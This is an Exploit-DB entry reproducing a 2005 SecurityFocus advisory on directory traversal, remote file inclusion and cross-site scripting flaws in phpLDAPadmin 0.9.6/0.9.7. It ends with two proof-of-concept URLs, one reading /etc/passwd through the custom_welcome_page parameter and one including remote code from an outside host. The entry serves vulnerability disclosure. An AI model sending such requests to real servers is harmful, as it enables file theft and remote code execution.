phpLDAPadmin 0.9.6/0.9.7 - 'welcome.php' Arbitrary File Inclusion

EDB-ID:

26211


Author:

rgod

Type:

webapps


Platform:

PHP

Date:

2005-08-30


source: https://www.securityfocus.com/bid/14695/info

phpldapadmin is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.

phpldapadmin is prone to a directory traversal vulnerability. An attacker can exploit this vulnerability to retrieve arbitrary files on the vulnerable system in the security context of the Web server process. Information obtained may aid in further attacks against the underlying system; other attacks are also possible.

phpldapadmin is prone to a remote file include vulnerability. An attacker can exploit this vulnerability to execute arbitrary PHP script code in the security context of the Web server process.

phpldapadmin is also prone to a cross-site scripting vulnerability. An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. 

http://www.example.com/phpldapadmin/welcome.php?custom_welcome_page=../../../../../../../../etc/passwd
http://www.example.com/phpldapadmin/welcome.php?custom_welcome_page=http://www.example.com/[malicious code]